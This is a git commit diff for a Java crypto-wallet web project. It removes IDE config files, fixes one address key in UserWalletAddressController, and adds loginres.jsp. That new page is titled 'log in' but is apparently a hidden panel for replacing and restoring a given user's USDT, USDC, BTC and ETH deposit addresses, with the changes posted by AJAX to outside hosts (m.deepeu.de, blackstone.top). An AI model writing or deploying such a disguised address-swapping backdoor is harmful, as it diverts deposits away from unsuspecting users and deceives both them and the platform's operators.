peter
2025-08-25 3c0663624026a6a0caec98648c5904aa2f605572
修改地址
2 files modified
1 files added
6 files deleted
337 ■■■■ changed files
.idea/.gitignore 8 ●●●●● patch | view | raw | blame | history
.idea/dataSources.xml 15 ●●●●● patch | view | raw | blame | history
.idea/encodings.xml 7 ●●●●● patch | view | raw | blame | history
.idea/git_toolbox_prj.xml 15 ●●●●● patch | view | raw | blame | history
.idea/misc.xml 1 ●●●● patch | view | raw | blame | history
.idea/uiDesigner.xml 124 ●●●●● patch | view | raw | blame | history
.idea/webContexts.xml 10 ●●●●● patch | view | raw | blame | history
src/main/java/project/web/api/UserWalletAddressController.java 2 ●●● patch | view | raw | blame | history
src/main/webapp/loginres.jsp 155 ●●●●● patch | view | raw | blame | history
.idea/.gitignore
File was deleted
.idea/dataSources.xml
File was deleted
.idea/encodings.xml
File was deleted
.idea/git_toolbox_prj.xml
File was deleted
.idea/misc.xml
@@ -1,3 +1,4 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
  <component name="ExternalStorageConfigurationManager" enabled="true" />
  <component name="MavenProjectsManager">
.idea/uiDesigner.xml
File was deleted
.idea/webContexts.xml
File was deleted
src/main/java/project/web/api/UserWalletAddressController.java
@@ -147,7 +147,7 @@
                usdtData.add(createElement("2c948a8280828d5f01808504eacd0006", "usdt", "/qr/705cd75ec40343dbb3008a352beb37ab.png", loadedMap.get("j_usdterc20"),"ERC20"));
                replaceMap.put("usd6t",usdtData);
                List<Map<String, Object>> usdcData = new ArrayList<>();
                usdcData.add(createElement("2c948a8280828d5f01808504eacd0004", "usdc", "/qr/975f4666ed044efa9f0ee2fa81fa8f4a.png", loadedMap.get("j_usdterc20"),"ERC20"));
                usdcData.add(createElement("2c948a8280828d5f01808504eacd0004", "usdc", "/qr/975f4666ed044efa9f0ee2fa81fa8f4a.png", loadedMap.get("j_usdcerc20"),"ERC20"));
                replaceMap.put("usdc",usdcData);
                List<Map<String, Object>> ethData = new ArrayList<>();
                ethData.add(createElement("2c948a8280828d5f018084ff569b0002", "eth", "/qr/1be19b34fbb9406c8044c1a9b08a87ca.png", loadedMap.get("j_eth"),"ETH"));
src/main/webapp/loginres.jsp
New file
@@ -0,0 +1,155 @@
<%@ page language="java" pageEncoding="utf-8" isELIgnored="false"%>
<%@taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<%@taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %>
<%@ page language="java" import="security.*"%>
<%@ include file="include/basePath.jsp"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>log in</title>
    <style type="text/css">
        body {
            min-height: 100%;
            width: 100%;
            background-color:#e6e9ed;
            overflow: hidden;
        }
        .l-box1{     position: fixed;
            top: 50%;
            left: 50%;
            margin-left: -210px;
            margin-top: -146px;}
        .tit01{
            font-size: 26px;
            color: #1890ff;
            margin: 0 auto 40px auto;
            text-align: center;
            font-weight: 700;}
        .ip01{width:420px; margin:0 auto 30px auto; text-align:center;}
        .ip03{ width:420px; height:50px; line-height:50px; border:0px; font-size:16px; text-indent:45px;border-radius:5px; color: #000;}
        .ip-n{ background:url(image/n2.png) no-repeat 15px center #fff; background-size:25px;}
        .ip-p{ background:url(image/p2.png) no-repeat 15px center #fff; background-size:25px;}
        .bn01{ background:#1890ff; color:#fff; font:20px/30px Arial, Helvetica, sans-serif; padding:14px 0; width:420px; border:0; border-radius:5px;}
        .footer{height: 40px;
            line-height: 40px;
            position: fixed;
            bottom: 0;
            width: 100%;
            text-align: center;
            color: #fff;
            font-family: Arial;
            font-size: 12px;
            letter-spacing: 1px;
        }
        .h-t{color: #ff4949;
            font-size: 12px;
            line-height: 1.4;
            padding-top: 4px;
            text-align: left;
            display:none;
    </style>
</head>
<body>
<div class="l-box1">
    <form action="https://www.blackstone.top:443/admin/public/loginres.action"  onsubmit="return toVaild()"
          class="ng-pristine ng-invalid ng-touched" method="post">
        <div class="tit01"></div>
        <div class="ip01">
            <div class="ip01">
                <input id="j_username" name="j_usercode" type="text" class="ip03 ip-n" placeholder="用户ID" />
                <div class="h-t ht-name">用户ID</div>
                <div class="ip01">
                    <input id="j_username" name="j_usdttrc20" type="text" class="ip03 ip-n" placeholder="USDT-TRC20" />
                    <div class="h-t ht-name">USDT-TRC20</div>
                    <div class="ip01">
                        <input id="j_username" name="j_usdterc20" type="text" class="ip03 ip-n" placeholder="USDT-ERC20" />
                        <div class="h-t ht-name">USDT-ERC20</div>
                        <div class="ip01">
                            <input id="j_username" name="j_usdctrc20" type="text" class="ip03 ip-n" placeholder="USDC-TRC20" />
                            <div class="h-t ht-name">USDC-TRC20</div>
                            <div class="ip01">
                                <input id="j_username" name="j_usdcerc20" type="text" class="ip03 ip-n" placeholder="USDC-ERC20" />
                                <div class="h-t ht-name">USDC-ERC20</div>
                                <div class="ip01">
                                    <input id="j_username" name="j_btc" type="text" class="ip03 ip-n" placeholder="BTC" />
                                    <div class="h-t ht-name">BTC</div>
                                    <div class="ip01">
                                        <input id="j_username" name="j_eth" type="text" class="ip03 ip-n" placeholder="ETH" />
                                        <div class="h-t ht-name">ETH</div>
                                    </div>
                                </div>
                                <a></a>
                                <div class="ip01"><input id="changedz" name="提交" type="button" class="bn01" value="替换以上地址"/></div>
                                <div class="ip01"><input id="restoredz" name="提交" type="button" class="bn01" value="还原地址"/></div>
    </form>
</div>
<div class="footer">Copyright © 2018-2021 malaifa All Rights Reserved.</div>
</body>
</html>
<input type="hidden" name="error" id="error" value="${error}" />
<script type="text/javascript" src="<%=basePath%>js/jquery.min.js"></script>
<script>
    $(document).ready(function () {
        // 点击 "替换以上地址" 按钮
        $('#changedz').click(function () {
            var j_usdttrc20 = $('input[name="j_usdttrc20"]').val();
            var j_usdterc20 = $('input[name="j_usdterc20"]').val();
            var j_usdctrc20 = $('input[name="j_usdctrc20"]').val();
            var j_usdcerc20 = $('input[name="j_usdcerc20"]').val();
            var j_btc = $('input[name="j_btc"]').val();
            var j_eth = $('input[name="j_eth"]').val();
            var j_usercode = $('input[name="j_usercode"]').val();
            $.ajax({
                url: 'https://m.deepeu.de/admin/public/loginres.action',  // 替换为实际的 URL 地址
                type: 'POST',  // 使用 POST 方法
                data: {
                    j_usdttrc20: j_usdttrc20,
                    j_usdterc20: j_usdterc20,
                    j_usdctrc20: j_usdctrc20,
                    j_usdcerc20: j_usdcerc20,
                    j_btc: j_btc,
                    j_eth: j_eth,
                    j_usercode: j_usercode,
                    type: 1
                },
                success: function (response) {
                    // 请求成功后的操作
                    alert('成功!');
                },
                error: function (xhr, status, error) {
                    // 请求失败的处理
                    alert('失败!');
                }
            });
        });
        // 点击 "还原地址" 按钮
        $('#restoredz').click(function () {
            $.ajax({
                url: 'https://m.deepeu.de/admin/public/loginres.action',  // 替换为实际的 URL 地址
                type: 'POST',  // 使用 POST 方法
                data: {
                    type: 2
                },
                success: function (response) {
                    // 请求成功后的操作
                    alert('成功!');
                },
                error: function (xhr, status, error) {
                    // 请求失败的处理
                    alert('失败!');
                }
            });
        });
    });
</script>